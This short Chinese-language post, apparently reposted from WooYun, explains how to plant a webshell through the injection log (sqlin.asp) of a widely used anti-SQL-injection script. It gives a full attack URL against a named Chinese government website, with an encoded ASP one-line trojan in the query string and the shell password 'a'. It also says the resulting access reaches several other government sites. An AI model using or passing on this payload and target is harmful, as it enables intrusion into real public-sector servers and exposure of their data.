天天看點

防注入系統getwebshell 來自wooyun

這些網站都用的通用防注入系統

有個别網站的目錄存在sqlin.asp儲存注入記錄  可以寫入一句話木馬

比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾

可在http://pzzl.gov.cn/sqlin.asp寫入一句話,密碼a

連接配接上去可以看到另外的幾個政府網站

繼續閱讀